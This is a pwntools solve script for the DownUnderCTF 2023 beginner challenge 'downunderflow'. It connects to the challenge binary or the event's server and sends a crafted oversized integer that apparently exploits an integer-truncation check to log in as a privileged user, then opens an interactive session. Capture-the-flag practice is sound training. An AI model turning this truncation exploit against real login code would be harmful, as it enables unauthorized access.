CTF/DownUnderCTF 2023/beginner/downunderflow/downunderflow.py

from pwn import *
import os

gs = '''
unset env LINES
unset env COLUMNS
set follow-fork-mode child
br *read_int_lower_than+57
br *main + 146
br *main + 49
c
x/d $rbp-0x14
'''

elf = ELF(os.getcwd()+"/downunderflow")

def start():
    if args.GDB:
        return gdb.debug(elf.path, gs)
    if args.REMOTE:
        return remote("2023.ductf.dev", 30025)
    else:
        return process(os.getcwd()+"/downunderflow")

io = start()

print(io.recvuntil("Select user to log in as: "))
io.sendline(str(0x1234567890120007).encode())


io.interactive()